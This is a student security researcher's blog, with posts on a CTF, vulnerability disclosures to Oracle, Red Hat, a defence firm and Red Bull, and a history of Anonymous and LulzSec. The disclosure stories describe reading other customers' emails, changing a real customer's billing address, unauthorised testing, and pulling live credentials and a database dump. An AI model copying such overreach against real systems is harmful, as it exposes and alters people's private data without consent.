A little bit about CTFs if you've never participated in one before. CTFs are events that are usually hosted at information security conferences, These events consist of a series of challenges that vary in their degree of difficulty, and that require participants to exercise different skillsets to solve. Once an individual challenge is solved, a "flag" is given to the player and they submit this flag to the CTF server to earn points. Players can be lone wolves who attempt the various challenges by themselves, or they can work with others to attempt to score the highest number of points as a team.

CTF events are usually timed, and the points are totalled once the time has expired. The winning player / team will be the one that solved the most challenges and thus secured the highest score.

Types of Events - The two most common types are:

Red Team/Blue Team - In this style of event the red team attempts to capture flags while the blue team attempts to defend the various flags from being captured.

Red Team - Usually involves one or more people, working alone or on a team, who attempt to capture various flags while there is no team defending them.

Types of Challenges - Some popular areas of focus are:

Programming - Usually require some sort of programming to solve. In most cases, it will involve a mixture of programming and some reverse engineering.

Crypto - feature common "real world" algorithms or scenarios that often include the ever-popular ransomware type of malware.

Web - Usually vulnerabilities that are in OWASP top 10.

Reverse Engineering - Typically the process of taking a compiled machine code - bytecode program and converting it back to a more human readable format.

OSINT - Known as Open-source intelligence, you will be required to dig deep to find old information like a user's first tweet for example.

Pwn - In this challenges you usually have to buffer overflows, by using the ctf framework called pwntools you will dev your python exploit.

Misc - miscellaneous challenges these are a bit random, can be various types.

Okay, let's talk about the event.

I was notified about this virtual event taking place by a fellow member of the Ethical Hacking Society at GCU, I never participated before in any of ENUSEC's CTFs, I know their first Le Tour Du Hack took place in 2017. I simply couldn't let the opportunity pass, as usual I am very busy, involved in a few projects but I thought; what's the worst that could happen? I must try this CTF.

So I signed up, the event was running for a 2 day CTF for all abilities! Top 3 teams to win the following Prizes:

1st Place -> £1000

2nd Place -> £500

3rd Place -> £250

And they also had 50 free LTDH21 swag bags to a lucky 50 participants, including a T-shirt and other goodies, Thanks to SecureWorks for sponsoring this wonderful event.

The event started on Sat, 19 Jun 2021 at 10:00 am and it was finishing on Sun, 20 Jun 2021, 19:00 BST. To begin with we were a team of two for most of Saturday and then in the evening I seen another mate was competing alone so I invited him to join us.

Within two hours we already had over 4k points and grinding away to climb the leaderboard, we were on 8th and rocking. We had managed to complete 30 challenges from the misc, reverse engineering, osint (trivia), and web categories. I was chuffed with the result so far because I wasn't thinking we would do so well. My personal aim was to be in Top10 at least and just enjoy the event.

Finished the saturday around 23.00 and started again on Sunday we were mainly going over the challenges we couldn't solve the previous day. I convinced a few other mates to join and we were now a team of five. It was a slow day because we had only the hardest of challenges to solve, we then started dropping a few places on the leaderboard however I was still happy that we remained in Top 10 till nearly towards the end of the event, we were not chasing to win this event but to have fun, we had a tiny team put together very fast at last second unlike other teams who had 10 to 15 members. 👀

We managed to solve another 7 challenges and settled on 11th place. We were really close to a few Web challenges but couldn't quite figure out the last part to get the flags.

I have to say I totally enjoyed this CTF and I will definitely recommend it to beginners, I would say the challenges were not too hard, unlike other events I have been such as Hack The Box University CTF, Try Hack Me (HackBack) or pwnED.

Congrats to SIGINT, crOwn and theIgloo (Abertey Hackers) for winning the competition!

And many thanks for my fellow team mates for their participation in the CTF, couldn't do it without you. We have learned a ton and had a great weekend, If time allows; I will post a follow up blog of how we solved a few of the challenges.

I hope face to face CTFs will be allowed again soon. I'm getting flashbacks of 🡣 our last in person CTF.

To be continued ...

Have you got any suggestions for me ? Get in touch!

Thank you for reading my article, Until next time!

Your friendly neighbourhood Hacker.

I started this blog so that I could share with you my findings when it comes to vulnerabilities. As you may have noticed there has not been any significant findings of late, this is not because I have been looking, in fact quite the opposite.

I had an idea over a year ago about creating a business that would provide much needed digital services at an competitive price. I wanted the business to be the champion for small-to-medium businesses, a place where they could go and feel that we as a business cared about them and their business, not just our bottom line. We feel that if we help others and we are fair with our offerings, the wheel will turn round.

"The wheel of fortune turns round incessantly, and who can say to himself, I shall today be uppermost."

We wanted to create a business and combine two services that originate from our background skills, User Experience/Interface with Design Innovation and Cyber Security.

What started off a very ambitious project by joining two of the most needed services Cyber Security and Digital Marketing. Besides the services we offer now we had planned to offer Security services, we soon realised this would be too intensive to start, so we scaled back. This will allow room for personal development (yayy!), although these services will be added in due course.

When I have an idea, I research, research and research more. This is where I have been.

There are a multitude of agencies and freelancers building websites but not many create with UX/UI, and most importantly security in mind. This is one aspect where we differentiate from our competitors, we help our customers make the best choices and guide them every step of the way to achieve the end goal.

The sites are built using modern web design techniques and the latest technology therefore empowered for high performance, responsive across many devices, highly customisable and offensive security proofed.

"Don't run before you can crawl."

We built our website from the bottom up ourselves and researched into the services that were the most sought after by SMEs. We are currently offering Website Design and Development, Search Engine Optimisation and Website Management. We have seen other competitors provide these services at exorbitant rates, and wanted to make them more accessible.

One aspect of the business that we are most proud of it the charitable side. We could not find anyone else offering this service. Providing help through building free websites to not-for-profit newly established charities. We look forward to getting involved in projects with a cause. Find more about this at Charity.

Starting a business has proved to have its ups and down. It has so far had more ups. It has been great learning a whole host of new skills and meeting potential clients as we did not see it attracting attention so soon.

Interested in any of our services? Find us at Octavis.io, book a meeting and choose a day and time that suits you.

We cannot wait to see where the business takes us, and it will be interesting to see what happens when we add Cyber Security services. If you made it this far, Thank you very much! Have you got any feedback for us?  hello[at]octavis.io

GCU's student news got in touch with me after reading the article I had written about Red Hat. I am pleased to say that I have been featured on my University's Student News page due to the vulnerability disclosure. 🤯

GCU Ethical Hacking student identifies major website flaws for massive software company | GCU

A GCU Ethical Hacking student has impressed a large software company for using their skills to fix some significant errors found on their website.

GCUdigitalteamgcu.ac.uk

It pays off to be curious, explore and push boundaries.

It's exciting and eye opening how my journey has been over the last year.

"I love what I'm doing and will continue to do it, and there's nothing you can do to stop me."

Thanks everyone for the continuous motivation, love and support. It really means a lot.

Have you got any suggestions or questions for me ? Get in touch!

Thank you for reading my article, Until next time!

Your friendly neighbourhood Hacker.

I hope everyone is safe and well! I have not been active on the blog recently. It's time for an update of what I've been doing.

Today I am writing a short article on my disclosure to Oracle.

Casual day, browsing the internet, looking for my next victim (joke!) a page that belonged to Oracle had an error that caught my attention. I decided to have a look into it, this was mainly because of the domain name where the error occurred, it was a bank that provides financial infrastructure to deliver a range of B2B banking solutions and services, enabling businesses to trade globally.

They are using digitally disruptive technology that frees it from the legacy systems that make those traditional banks slow and expensive.

After doing some white magic (DNS level) and taking over the bank's domain which would also result in taking over Oracle's domain, essentially owning 2 high authority domains in one go.

This is the type of issue would benefit someone with malicious intent and little know-how, this was concerning to me because the banking company currently processes 130 billion in payments annually for its clients, which include banks, card entities, and payment gateways that choose. It also has partnerships with several other banks to provide direct clearing access, making the payments faster and cheaper.

Because I found this through Oracle, it was time to send them an e-mail and point out my concern. Oracle security team were prompt and fixed the issue that relied on their end and informed the 3rd party as well.

A few weeks go by and I receive an e-mail to say that I will be given credit in the upcoming Critical Patch Update, due to be released at 1:00 PM, U.S. Pacific Time, on January 19, 2021.

Oracle Critical Patch Update Advisory - January 2021

January 2021

Since ~2 months, it looks like I've been absent from my blog and my usual hobbies Hack The Box, CTFs and so on. I had to get my priorities first, my University assessments, which were quite odd, due to this year's being digitally delivered.

Unfortunately, there is only so many hours in a day and my time is already so limited, as my kids are growing they require more and more of my attention.

Despite all this, I have been doing lots of cool stuff and I have many stories like this one to talk about! At the moment Hack The Box is on pause, CTFs are on pause and looking for bugs is on pause as well, This is because I've committed to a bigger project! Stay tuned to find out more.

Have you got any suggestions or questions for me ? Get in touch!

Thank you for reading my article, Until next time!

Your friendly neighbourhood Hacker.

Sometimes in life, we hear facts, facts that shock us. These facts can be along the lines of "Did you know all the plastic ever manufactured is still on the planet?" Shocking isn't it. Another fact that seems to shock even the most tech-savvy, is that there are on average 84,500 attempted cyber-attacks per day on small businesses within the UK (Hiscox, Hiscox), The average mean cost of a cyber security breach for a small business in 2019 was £11,000 (Official Gov.uk Cyber Security Breaches Survey 2019).

Now that is shocking. However, most breaches are minor and do not cause much damage or inconvenience but what happens when the breach is not so small and could cause the company lots of damage? What if these breaches reveal personal information about consumers and their orders?

Let's look at a couple examples

A couple more to jog your memory, remember the infamous Cambridge Analytica scandal? this compromised the data of 87 million users.

How about a recent settlement, The Information Commissioner’s Office has fined Ticketmaster UK Limited £1.25million for failing to keep its customers’ personal data secure.

Ok, enough with the stats!

An imminent breach was discovered by me and this is how it happened.

Before we move on please see /disclaimer/

It all started on a sunny day shortly after I received the e-mail pictured below, I assumed this was due to have just enrolled RedHat Academy as a requirement for one of my modules at University.

As we can see nothing bad in here, thanks for being chosen for this RedHat!

Opening the underlined hyperlink takes me to a training portal, it does it's authentication through their SSO (Single Sign-On).
‌

I log in with my RedHat account and browse about the website, the portal can be seen below.

Nothing out the ordinary here, I was purely just looking to see what's in it for me.

I head to my profile and find a section where it showed me the e-mail I had just received.

This is what caught my attention. This is just a coincidence o_O

You know what I'm thinking right? Allowed to see the source code, resend button.. hmm! Bug Hunter mode ON! But wait wait wait, Do they have a policy?

• I had no vulnerability found at this stage but I needed to know that I am allowed to proceed.

Turns out RedHat does have a Vulnerability Disclosure Program, but not a Bug bounty program [..] a quick google searched and found a link on HackerOne.

At this stage, it was apparent to me that if I decided to go ahead and try to find something I was not going to get any monetary rewards. I'm cool with that as I previously mentioned in my other articles, I'm in for the learning experience and if I can add any value, why not.

Coming back to the source code of the e-mail, by allowing anyone to see this, makes it so much easier to grab the HTML code and use it for spear phishing attacks, Then I wondered, what is the purpose of this resend button?

Time to summon the interceptor God, I'm talking about Burp Suite! Big congrats to Portswigger Team for building such a fantastic application security testing software.

So at this stage, I just want to see what the requests look like, what parameters there are when I interact with the portal, what happens when I click resend etc.

My initial attack vector was just simply to see if I can edit the source code, place my own website as the hyperlink and resend it to myself. If I could do that successfully then I build from there onwards.

I spent some time trying to achieve this but I couldn't, I tried to blame it on my inexperience however based on what I could see within the requests I started to realize that the template of the e-mail is loaded from within the app and I cannot modify these templates or add my own.

Ok dammit.. nothing yet.. Time to enumerate more!

A couple interesting parameters I noticed were sessionId="abc1234" and emaId="1234" (examples)

So what really happens if I capture a request when I ask the application to show me the contents of my email (with my own emailId) but then I change that value to see if I can access other email's correspondence.

Yep, we're talking about an IDOR (Insecure direct object references).

What is an IDOR vulnerability?

There can be many variables in the application such as "id", "pid", "uid" etc. Although these values are often seen as HTTP parameters, they can be found in headers and cookies. The attacker can access, edit or delete any of other users’ objects by changing the values. This vulnerability is called IDOR.

First, it needs to understand the application flow developed by software developers. All the modules functions and their sub-modules functions need to be understood when the logged-in user into the web/mobile application. It is also important to remember that this vulnerability is as severe as XSS, CSRF in security testing and as a type of vulnerability that is not easily discovered (automatized testing or manual testing).

The IDOR vulnerability is illustrated in the following image between user and server.

Okay, changed the values, sent the request... I get this:

Wow.. so now I see this customers email and can download their attachments, checking the source code of that email reveals no private information about this customer besides their full name.
Each customer had an inbox so every time I would pick a different emailId, I'd get a different inbox, so I played around with this for a while, trying to increase severity of this bug, the contents were all similar, some were revealing significantly more information (payment related).

Moving on, what else is possible to access besides these emails.

I noticed the tab "My Orders" so I clicked there.

Of course, I didn't have any orders, so trying to search for product names like "red hat certification" or some unknown order number revealed no entries found.

I decided to capture a blank request on the Search button to see what parameters are there.

So we can see in_param2=" ", playing with this value, with my first try I managed to find a result.

Perfect! Now capturing the next request will give me a better idea of how this request looks when opening the order tab.

Ok as you can see this allows me to see this particular customer whose order I found playing with the in_param2 value. I can Print Order, View Transaction Details, Cancel/Refund Order, Change billing address, View Full Details.

I decided straight from the beginning I will not try the Cancel/Refund order function but I did try "changing the billing address".

As seen below, I was able to add a new billing address and set it as default. I noticed I wasn't able to remove this address so I left notes for RedHat if they wanted to fix it themselves (I have restored the default billing address).

I tried to find other customer's orders without changing any details to their billing and as expected, I was able to find more customers. The purpose of this was to show RedHat that I can see more than just one customer's details.

I stopped there, one can assume that if this function worked then I could cancel/refund the order as well.

I got in touch with RedHat Security Team, sent them a detailed report with a step by step procedure to reproduce all the above, and I recorded those in a Proof of Concept video just to make it easier for them to identify exactly where and how I found these issues.

[sending null payloads...]

I know my article has many screenshots and a few are obfuscated for obvious reasons. I would love to add the proof of concept video but I agreed with RedHat not to disclose personally identifiable information about their customer base.

Timeline:

Congratulations Email [Received] We 07/10/2020 08:17am
Vulnerability Disclosure Report [Sent] Mon 12/10/2020 15:22pm
Acknowledgement of the Report [Received] 15/10/2020 09:06am
Needs more info from RedHat [Received] Mon 19/10/2020 14:07pm
More info [Sent] 19/10/2020 14:16pm
PoC validated by RedHat [Received] 20/10/2020 16:15pm
Issues remediated [Received] 16/11/2020 22:56pm
Added to Hall of Fame [Received] 17/11/2020 09:26am

Vulnerability Acknowledgements for Red Hat online services - Red Hat Customer Portal

Vulnerability Acknowledgements for Red Hat online services.

Red Hat Customer Portal

Have you got any suggestions or questions for me ? Get in touch!

Thank you for reading my article, Until next time!

Your friendly neighbourhood Hacker.

This blog is about Immersive Labs, and how it's helping me establish a good cyber security foundation and beyond.

I hope you will find this information useful.

This is not a sponsored article.

Immersive Labs is changing the way companies address their cyber skills challenges.

It is founded by former GCHQ cybersecurity instructor James Hadley, the platform combines learning methods used by hackers with real time threat intelligence to help your security team keep pace with attackers. They do this by creating story-driven virtual games in the browser, called labs.

A couple differences between IL and other platforms are:

Other platforms, e.g HackTheBox or TryHackMe might require you to have Linux on your host or a virtual machine installed and to connect to their VPN, for IL all you need is within your browser.

In each lab you get will get an information tab with a quick summary about that specific subject and a few resources to help you complete the lab. This is something you don't find in HackTheBox, however TryHackMe do have labs with a few 'hints' along the way.

Each lab allow the users to learn from real life scenarios ranging from cyber awareness to headline-hitting malware and everything in between.

These labs even include emerging threads and vulnerabilities the same day they're discovered.
Immersive Labs challenge users to find their own solutions, encouraging creative thinking and ultimately long term skills development and talent retention.

They offer options where you can even keep track of your team's progress as they complete labs, they use this information to benchmark the organization's cyber capabilities against industry frameworks, including MITRE ATT&CK, meaning they always know where our strengths - and most importantly, our weaknesses - lie.

Immersive Labs is free for students, it's name is "Students’ Digital Cyber Academy™", IL have mentioned that the labs on the platform are as used by Goldman Sachs, Deloitte and BAE Systems use to train their staff.

A couple of my lecturers had mentioned this platform when I started my studies at University and ultimately this is how I joined. All you need to register is your student email and you will have access to hundreds of labs and more created every day.

They are building content and simulations that challenge users at any level to rapidly and constantly upskill, anyone can start from scratch, gathering the basics through a series of labs to build a strong foundation of cyber security knowledge.

Users will be using a variety of operating systems and security tools as well as learning how to analyze log files and code.

For example, gamified scenarios let users see the impact of their decisions in real time and better understand outcomes.

Story-based threat simulations empower users to enhance while stopping an online breach or hacking industrial control systems, including contained access to operating systems , tools and malicious code.

I believe that this is a good way to continuously develop cyber skills,
every part of your work force needs some level of cyber skills, Traditional teaching e.g classroom and online training might not offer enough visibility of how effective these courses are and can become quickly out of date. Also training isn't always directly relevant to the real risks we face.

Competition

Immersive Labs have 3 types of ranking on their Leaderboard system.

• My Organization
• Global Ranking
• League Table

My Organization is formed of people who are part of the same domain, so what I mean by that, I enrolled under my student e-mail so therefore IL knows I belong to Caledonian University, the ranking is you vs all the users from the same domain.

Global Ranking is yourself vs everyone that is registered on Immersive Labs.

League Table is your Organization or for example in my case, my University vs all the other universities that are registered.

Another good point to mention is that Immersive Labs have structured the content you receive based on the persona you pick.

They currently have 5 different types of personas:

Non-Technical - You don't work in cyber security, but you've seen stories in the news about recent attacks and would like to understand more about staying secure.

Executive - You are a senior executive or board member. You want to understand cyber security topics and risk decisions in more detail.

Engineer - You work with computers and networks on a daily basis. You want to understand how to improve security when building and deploying new infrastructure.

Developer - You are responsible for developing and maintaining applications in your environment. You would like to acquire and demonstrate knowledge and skills to keep those applications secure.

Cyber-Professional - You currently work (or aspire to work) in a cyber security role and like to keep up with the latest threats. You enjoy learning about risk and solving technical problems in both a defensive and offensive environment.

You can can switch between persona's and solve different labs. The points you receive are unique to each persona and will not be added in total.

What is the outcome?

You become the driving force behind patching the security posture.

You can learn the skills you need to help your organization stay secure, better understand cybersecurity threats, like detecting and understanding phishing and malware reverse-engineering.

My current stats:

My main persona: Cyber Security Professional

Completed 233 labs

Completed Objectives:

1. Become a Junior Penetration Tester
2. Become a Tier 1 SOC Analyst
3. Essential Cyber Security for Remote Workers 4 – Attacks & Vulnerabilities
4. Essential Cyber Security for Remote Workers 2 – Cyber Security Awareness
5. Protect Yourself Online
6. Essential Cyber Security for Remote Workers 1 – Intro to Cyber Security
7. Essential Cyber Security for Remote Workers 3 – Terminology & Technology
8. Introduction to Network Technologies
9. Introduction to Operating Systems
10. Introduction to Cyber Investigations

Leaderboard

• Organization

• Global Ranking

• League Table

Have you got any suggestions for me ? Get in touch!

Thank you for reading my article, Until next time!

Your friendly neighbourhood Hacker.

In life, there are debates, debates that seem to go on forever with never a definitive conclusion in sight. Theses debates like many other spans on over centuries and give what is known as "age-old questions" one such question in Ethical Hacking is "When does white, become grey?" Some say when your intentions change from ethical to unethical, some say when you do something you have not had permission for, no matter what your intentions are. Regardless of what our individual opinions are there are laws and that is what defines our grey area, the most well known relevant act is the Computer Misuse Act 1990, which brings in three offences:

1. Unauthorized access to computer material.
2. Unauthorized access with intent to commit or facilitate the commission of further offences.
3. Unauthorized acts with intent to impair, or with recklessness as to impairing, operation of a computer, etc.

This act has since been amended twice, by the Police and Justice Act 2006 and by the Serious Crime Act 2015 – this introduced:

3ZA.Unauthorised acts causing or creating a risk of, serious damage.3A. Making, supplying or obtaining articles for use in the offence under section 1, 3 or 3ZA.

All these offences carry a different prison sentence with offence 1) and 3A) having a possible sentence of 2 years imprisonment, offence 2) is five years imprisonment, 3) is 10 years, and lastly offence 3ZA) is the most serious crime covered by this act and has a maximum sentence of life.

Before we move on please see /disclaimer/

So here I am sitting at my desk with this bug that I have just confirmed, knowing this could potentially be exploited by a Blackhat hacker to the extent of where the company's security is at risk, or even worse, end up being held for ransom since this is very common in 2020.

By looking at the above laws, my case would fall into category 1) since I did not have permission for testing, therefore I was unable to disclose this vulnerability that affected them.

So what do I do? Should I just ignore it and go on with the rest of my day?

I think this is many researcher's dilemma if you remember the case where two Pentesters had written authorization to test the physical security and were later arrested on felony third-degree burglary charges. (Currently, the charges have been dropped.)

Take another example only a few weeks previously I remember reading a post on LinkedIn where a company that specializes in mobile app Pentesting had looked into an application and found a critical vulnerability where users data was at risk of being breached. Said Pentester contacted the owner of the application but their report was ignored, the Pentester then went public with their findings which caused the company to deny any allegations which started a dispute between the two parties.

Here are a couple more grey hat hackers examples here.

I believe all the companies and the current legislation should enable researchers to safely undertake some analysis and therefore support businesses, especially those who cannot afford testing and are at huge risk from being hacked.

In the end, I decided to do what was best according to the values that I hold and disclose the information. I knew there was potential for the company in question to be rather annoyed, and they had every right to be according to the law. However I knew my intentions were honourable and hoped that would stand me in good stead and they wouldn't be too annoyed to the extent that they would report me, but you never know who is at the other side of the computer and therefore you will never know how they will react.

In regards to the vulnerability, I found I am talking about a British multinational engineering and defence business, with a net worth of over 16 billion pounds.

This particular company did not have a vulnerability disclosure policy in place at the time of my findings. The person whom I approached to report my findings was very polite and professional, they are the Cyber Incident Lead at the company in question.

They helped me by sharing the details of their SOC where I could send my report, this e-mail in question is not openly shared on the web.

I could only imagine how busy a person with such responsibility could be, so I left them to it not thinking "what did I just start."

A couple months went by, and of course, I received some updates along the way stating that the cyber department is still working on the matter. It soon came to light that my action prompted the company to perform analysis on all their domains which could be in the hundreds of thousands, at the same time they rolled out their vulnerability disclosure policy.

This was later confirmed when I received the following.

"We were already rolling out the vulnerability disclosure policy, but your engagement was nicely timed to validate the need for external parties having a viable and approved entry into the business."

Conclusion

• The company has fixed the flaw I reported and has since checked all their assets for such vulnerabilities.
• I have met some wonderful people and made connections within the IT industry.
• The company has put in place their vulnerability disclosure policy which is awesome, now researchers are legally allowed to report bugs they find within the scope of the program.
• I became more careful when engaging in tests especially regarding what policies and programs are in place.
• This opportunity enabled me to look at the wider issue of the current legislation preventing the white hat/pentest community from undertaking some analysis.
• The Head of the Department at my University has been informed about my encounter with the company and they are aware of the value I added.
• I received an amazing book and cannot wait to read it.

Have you got any suggestions for me ? Get in touch!

Thank you for reading my article, Until next time!

Your friendly neighbourhood Hacker.

In this article I will talk about IRC, a very common server software. Ever since my adolescence I've been on and around IRC, it's just something I'll never forget about. Perhaps this is where my offensiveness comes from.

“The past beats inside me like a second heart.”

What is IRC?

IRC is an open protocol that uses TCP and, optionally, TLS. An IRC server can connect to other IRC servers to expand the IRC network. Users access IRC networks by connecting a client to a server. There are many client implementations, such as mIRC, HexChat and irssi, and server implementations, e.g. the original IRCd.

An IRCd, short for Internet Relay Chat daemon, is server software that implements the IRC protocol, enabling people to talk to each other via the Internet.

IRC CLIENTS

My go to client for Windows usage would be mIRC, this client only runs on the Windows operating system, so it will not work on Linux.

But if you are on Linux you'd want to pick between irssi or Xchat, these clients also work on Windows and of course there are more options to pick from. It's all about your preferences in terms of simplicity and graphics.

mIRC and Xchat creators

mIRC - Khaled Mardam-Bey, the developer of mIRC. Started working on mIRC in 1994 while studying for a Cognitive Science degree at the University of Westminster in London, where he first learned about the Internet.

XChat is the project of one man, Peter Železný also known as zed. XChat was initially developed as a Unix/Linux GTK application, however XChat now works on Windows too, this was due to being in such a high demand.

Connecting to IRC servers

The largest IRC networks have traditionally been grouped as the "Big Four"

The "Big Four" were:

• EFnet
• IRCnet
• UnderNet
• DALnet

Some statistics:

IRC reached 16 million users in 2001 and 10 million users in 2003.

Here are some of the largest IRC networks:

• freenode
• IRCnet
• EFnet
• Undernet
• QuakeNet
• Rizon
• OFTC
• DALnet

Latest news about IRC

Internet Relay Chat (IRC) has lost 60% of its users, from 10 million in 2003 to about 400,000 today. In 2003 there were 500,000 channels; now there is half that number. This is mainly due in large part to the advent of the Web, social media platforms, and other software that is more interactive and can do a lot more than plain text can do.

IRC IS NOT DEAD. [THE INTERESTING PART]

So if you may wonder what happens over on IRC servers, right now you'll be able to find all kind of servers ranging from seeking help with your project (e.g Freenode, previously known as Open Projects Network, is an IRC network used to discuss peer-directed projects.) or if you just want to hang out and talk to people you could try (DALnet). Let's not forget iRC servers have been the home for many hackers for a very long time, you could find some old school hackers on UnderNet however many of those guys will run private servers and hide from the world.

“Scars have the strange power to remind us that our past is real.”

1337 THE HACKER COLLECTIVE

The birth of Anonymous itself was sporadic and amorphous. It was created over several years, the beginning was around 2006 on the popular 4chan message board and in Internet Relay Chat channels. The first Anons were in it for the lulz–simple amusement.

Anonymous and its factions LulzSec and AntiSec drew widespread attention between 2008 and 2012 as they tore loudly through the internet ruthlessly hacking websites, exposing corporate secrets, raiding email spools, and joining the fight of the "We are the 99%". The groups appeared to be unstoppable as they attacked one target after another, more than 200 in all by the government's count. It seemed nobody was beyond their grasp.

Just as Anonymous gained mainstream notoriety, however, it seemed to disappear. Little was heard from the group again until 2010, when Anonymous defended the cause of file-sharers with DDoS attacks aimed at the Motion Picture Association of America and others. But the move that really got the group attention was Operation: Payback, a series of DDoS attacks against PayPal, Visa and MasterCard for their refusal to process donations to WikiLeaks after the site began publishing the leaks of Chelsea Manning also Operation Last Resort, which targeted the U.S. Sentencing Commission and MIT websites to protest the unusually harsh prosecution of internet activist Aaron Swartz, Anonymous has gone silent for the most part.

When WikiLeaks drew attention to the DDoS attacks, interest in Anonymous grew exponentially. Participation on the public channel where members and spectators communicated jumped tenfold from 700 to 7,000 people.

I personally remember the AnonOps IRC server which I believe it still exists to this day, They were using Etherpad to keep the participants updated on the current Operations. Etherpad is a web application that allows for real-time group collaboration of text documents.

The group was undone in part by Hector Xavier Monsegur, known online by the nom de hack Sabu.

Check this if you are curious to see all the Ops that were carried out by the Anonymous hacking group.

LulzSec? Sure!

Lulz Security, abbreviated as LulzSec, was a black hat computer hacking group that claimed to be responsible for several high profile attacks, including the compromise of user accounts from Sony Pictures in 2011. The group also claimed responsibility for taking the CIA website offline.

One of the founders of LulzSec was identified by Backtrace Security in 2011 in a PDF publication named "Namshub". Hector Xavier Monsegur.

Sabu featured prominently in the group's published IRC chats. The Economist referred to Sabu as one of LulzSec's six core members and their "most expert" hacker.

He later helped law enforcement track down other members of the organization as part of a plea deal. At least four associates of LulzSec were arrested in March 2012 as part of this investigation. British authorities had previously announced the arrests of two teenagers they allege are LulzSec members T-flow and Topiary.

At just after midnight on 26 June 2011, LulzSec released a "50 days of lulz" statement, which they claimed to be their final release, confirming that LulzSec consisted of six members, and that their website is to be shut down. This breaking up of the group was unexpected.

Those who have followed the movement closely have said Sabu's participation in the arrest of Jeremy Hammond and others has had a chilling effect on Anonymous, causing members to lay low and worry if additional informants are lurking among them.

Below are chatroom logs of discussions between the hackers involved in LulzSec.

. /$$                 /$$            /$$$$$$
.| $$                | $$           /$$__  $$
.| $$       /$$   /$$| $$ /$$$$$$$$| $$  \__/  /$$$$$$   /$$$$$$$
.| $$      | $$  | $$| $$|____ /$$/|  $$$$$$  /$$__  $$ /$$_____/
.| $$      | $$  | $$| $$   /$$$$/  \____  $$| $$$$$$$$| $$
.| $$      | $$  | $$| $$  /$$__/   /$$  \ $$| $$_____/| $$
.| $$$$$$$$|  $$$$$$/| $$ /$$$$$$$$|  $$$$$$/|  $$$$$$$|  $$$$$$.$
.|________/ \______/ |__/|________/ \______/  \_______/ \_______/
                          //Laughing at your security since 2011!

   __
   )|     ________________________.------,_ _
 _/o|_____/  ,____________.__;__,__,__,__,_Y...:::---===````//    #anonymous
|==========\ ;  ;  ;  ;  ; \__,__\__,_____ --__,-.\   OFF  ((     #lulzsec
           `----------|__,__/__,__/__/  )=))~((   '-\  THE  \\    #antisec
                        \ ==== \          \\~~\\     \  PIGS \\   
                        `| === |           ))~~\\     ```"""=,))  
                         | === |           |'---')                
                        / ==== /           `====='
                       ´------´

• Log.txt - Tensions Inside The Group 'for the lulz'

Identity [Sabu]

At the time of his arrest Xavier was 28-year-old, unemployed and facing a sentence of 124 years in prison.

Xavier served 7 months in prison after his arrest but had been free since then while awaiting sentencing. At his sentencing on May 27, 2014, he was given "time served" for co-operating with the FBI and set free under one year of probation.

Anonymous reacted to Sabu's unmasking and betrayal of LulzSec on Twitter, "#Anonymous is a hydra, cut off one head and we grow two back".

If you would like to learn more about Anonymous, here are some suggested reading materials: We Are Anonymous: Inside the Hacker World of LulzSec, Anonymous, and the Global Cyber Insurgency

OR

Here is my own copy of "The Many Faces of Anonymous".

Have you got any suggestions for me ? Get in touch!

Thank you for reading my article, Until next time!

Your friendly neighbourhood Hacker.

They say the devil makes work for idol hands and there has never been a more apt saying. With the summer practically spent in lockdown and all caught on up on my University work I decided it would be the right time to start a blog. Like anything you put out there on the internet it needed content and lots of it. It was then I decided to put to test some of the skills I had learnt so far from University and what I had taught myself. This led me to subdomain takeovers which I have covered in a previous post and from there bug bounties.

There is a stark contrast between pentesting labs e.g hackthebox and bug bounties on real world targets. Having spent a lot of my time on these labs where vulnerabilities are carefully placed within challenges I had an understanding of how to solve them. I was hopeful that, I will be fine finding bugs in the real world, and boy was I wrong. I remember seeing an announcement by HackerOne saying they had reached 300,000 registered hackers on their platform and I was thinking ..oh wow… so much competition. That is very true, there is a lot of hackers and you will submit reports that turn out to be duplicates.

A couple good deeds and my bug bounties not that they were bountiful at all ranged from the GOV/Military and NHS to top 500 fortune companies to name a few (Garmin & Accenture Hall of Fame). Coming back to the intended article I remember watching Formula 1 on Netflix one weekend and that is when the thought came to me “I wonder if Red Bull has a bug bounty programme” luckily I found that they have a Vulnerability Disclosure Program. I decided to set to work and see what vulnerabilities I could find within their companies’ website. Since I am still a beginner and everything is a learning curve for me I could only test for a few things that I knew how to perform successfully.

Since I had this frenzy going on with subdomain takeovers I decided to look and see if I could find any for Red Bull, long and behold I had found a couple that caught my attention and proceeded to look into those. I had successfully taken next.redbull.com and uploaded a Proof of Concept. Time to get in touch with Red Bull’s security team.

This is when Mark was assigned to my report and from that point on I communicated with him directly. I sent a report to him and soon after got a reply, Mark thanked me and it made me quite happy that someone appreciated my work.

Soon after Mark wrote back thanking me again for my report and telling me that he would want to organize a reward for me. Red Bull does not have a dedicated bug bounty program with pre-defined rewards in place and they don't see financial compensation as an appropriate way to reward individuals. However, they do practice a culture of individual rewards based on novelty and criticality of findings delivered.

For my first bounty I was happy with anything that was rewarded, I am not in a rush for monetary rewards I would rather learn from the experience and have fun doing it.

While waiting for my reward, due to Covid-19 things got delayed slightly and  a couple weeks went by without any delivery. Mark had decided to do something about this and came up with the plan to offer me a voucher to use on Red Bull shop (this was an exception and only a one-time reward  to honour me). I was excited again because guess what... they have Red Bull Racing merchandise there!

Before my voucher was due to be generated and since I had this one time opportunity for a voucher I had decided over the weekend to take a look over more of Red Bull's infrastructure and perform different kind of tests. This time I was looking for servers that would be vulnerable to injections and sensitive files.

I set up all my scripts, all my payloads, all the wordlists, all the targets.. ready to go... hit enter, I've launched all this tasks in the background as I knew this will be very laborious and I will end up with many false positives that I would need to check manually.

Over the weekend I began to inspect all the hits and different files I managed to access and scrape from thousands of servers belonging to Red Bull.

I took notes on anything interesting to be able to tell the security them afterwards.

While a few alerts were just simple like for example showing phpinfo, they weren't really disclosing any credentials and others lead me to some debug logs, some interesting dev panels, but nothing was too sensitive yet.. digging digging digging.. a couple hours later I came across some javascript files that had credentials to a FTP account, but they weren't valid.. hmm.. right.. I suppose it's still informative to see how they format their username and passwords.

Sometime later I came across some interesting files that peaked my interest.. this time they were json jwt tokens ..and yet again a magic js file however this time I struck lucky because it had credentials to endpoints, a few api secret keys and a couple MySQL databases that were valid and populated with data. Wow... I thought this one must be worthwhile reporting!

Also as a surprise the drinks finally arrived...!

I do remember Mark saying in an e-mail .. 'do enjoy the drinks when they arrive'

I really liked the Red Bull Watermelon Summer Edition, Cheers!

My hunt was not finished yet. I kept looking around and unbelievably came across  a MySQL dump of 200 MB and this was a goldmine. You can imagine what kind of data was inside this dump.

I had decided this was enough for me and started putting everything together in a  new report for the Red Bull Security Team.

Finished, Sent.

Perfect.. I was satisfied that my findings were useful to them and that they were working on fixing those.

